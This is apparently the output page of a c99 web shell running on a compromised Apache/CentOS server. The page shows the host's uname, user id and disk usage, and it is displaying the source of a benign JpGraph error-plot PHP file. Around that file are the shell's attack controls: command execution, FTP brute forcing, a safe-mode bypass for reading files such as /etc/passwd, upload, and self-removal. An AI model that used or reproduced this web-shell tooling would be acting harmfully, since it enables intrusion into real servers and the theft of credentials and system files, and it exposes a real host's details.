!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/jpgraph/src/   drwxr-xr-x
Free 52.36 GB of 127.8 GB (40.97%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     jpgraph_error.php (4.25 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*=======================================================================
// File:     JPGRAPH_ERROR.PHP
// Description:    Error plot extension for JpGraph
// Created:     2001-01-08
// Author:    Johan Persson (johanp@aditus.nu)
// Ver:        $Id: jpgraph_error.php 21 2005-05-30 20:35:34Z ljp $
//
// Copyright (c) Aditus Consulting. All rights reserved.
//========================================================================
*/

//===================================================
// CLASS ErrorPlot
// Description: Error plot with min/max value for
// each datapoint
//===================================================
class ErrorPlot extends Plot {
    var 
$errwidth=2;
//---------------
// CONSTRUCTOR
    
function ErrorPlot(&$datay,$datax=false) {
    
$this->Plot($datay,$datax);
    
$this->numpoints /= 2;
    }
//---------------
// PUBLIC METHODS
    
    // Gets called before any axis are stroked
    
function PreStrokeAdjust(&$graph) {
    if( 
$this->center ) {
        
$a=0.5$b=0.5;
        ++
$this->numpoints;            
    } else {
        
$a=0$b=0;
    }
    
$graph->xaxis->scale->ticks->SetXLabelOffset($a);
    
$graph->SetTextScaleOff($b);                        
    
//$graph->xaxis->scale->ticks->SupressMinorTickMarks();
    
}
    
    
// Method description
    
function Stroke(&$img,&$xscale,&$yscale) {
    
$numpoints=count($this->coords[0])/2;
    
$img->SetColor($this->color);
    
$img->SetLineWeight($this->weight);    

    if( isset(
$this->coords[1]) ) {
        if( 
count($this->coords[1])!=$numpoints )
        
JpGraphError::Raise("Number of X and Y points are not equal. Number of X-points:".count($this->coords[1])." Number of Y-points:$numpoints");
        else
        
$exist_x true;
    }
    else 
        
$exist_x false;
        
    for( 
$i=0$i<$numpoints; ++$i) {
        if( 
$exist_x 
        
$x=$this->coords[1][$i];
        else 
        
$x=$i;

        if( !
is_numeric($x) ||  
        !
is_numeric($this->coords[0][$i*2]) || !is_numeric($this->coords[0][$i*2+1]) ) {
        continue;
        }
        
        
$xt $xscale->Translate($x);
        
$yt1 $yscale->Translate($this->coords[0][$i*2]);
        
$yt2 $yscale->Translate($this->coords[0][$i*2+1]);
        
$img->Line($xt,$yt1,$xt,$yt2);
        
$img->Line($xt-$this->errwidth,$yt1,$xt+$this->errwidth,$yt1);
        
$img->Line($xt-$this->errwidth,$yt2,$xt+$this->errwidth,$yt2);
    }            
    return 
true;
    }
// Class


//===================================================
// CLASS ErrorLinePlot
// Description: Combine a line and error plot
// THIS IS A DEPRECATED PLOT TYPE JUST KEPT FOR
// BACKWARD COMPATIBILITY
//===================================================
class ErrorLinePlot extends ErrorPlot {
    var 
$line=null;
//---------------
// CONSTRUCTOR
    
function ErrorLinePlot(&$datay,$datax=false) {
    
$this->ErrorPlot($datay,$datax);
    
// Calculate line coordinates as the average of the error limits
    
for($i=0$i count($datay); $i+=) {
        
$ly[]=($datay[$i]+$datay[$i+1])/2;
    }        
    
$this->line=new LinePlot($ly,$datax);
    }

//---------------
// PUBLIC METHODS
    
function Legend(&$graph) {
    if( 
$this->legend != "" )
        
$graph->legend->Add($this->legend,$this->color);
    
$this->line->Legend($graph);
    }
            
    function 
Stroke(&$img,&$xscale,&$yscale) {
    
parent::Stroke($img,$xscale,$yscale);
    
$this->line->Stroke($img,$xscale,$yscale);
    }
// Class


//===================================================
// CLASS LineErrorPlot
// Description: Combine a line and error plot
//===================================================
class LineErrorPlot extends ErrorPlot {
    var 
$line=null;
//---------------
// CONSTRUCTOR
    // Data is (val, errdeltamin, errdeltamax)
    
function LineErrorPlot(&$datay,$datax=false) {
    
$ly=array(); $ey=array();
    
$n count($datay);
    if( 
$n != ) {
        
JpGraphError::Raise('Error in input data to LineErrorPlot.'.
        
'Number of data points must be a multiple of 3');
    }
    for(
$i=0$i count($datay); $i+=) {
        
$ly[]=$datay[$i];
        
$ey[]=$datay[$i]+$datay[$i+1];
        
$ey[]=$datay[$i]+$datay[$i+2];
    }        
    
$this->ErrorPlot($ey,$datax);
    
$this->line=new LinePlot($ly,$datax);
    }

//---------------
// PUBLIC METHODS
    
function Legend(&$graph) {
    if( 
$this->legend != "" )
        
$graph->legend->Add($this->legend,$this->color);
    
$this->line->Legend($graph);
    }
            
    function 
Stroke(&$img,&$xscale,&$yscale) {
    
parent::Stroke($img,$xscale,$yscale);
    
$this->line->Stroke($img,$xscale,$yscale);
    }
// Class


/* EOF */
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.007 ]--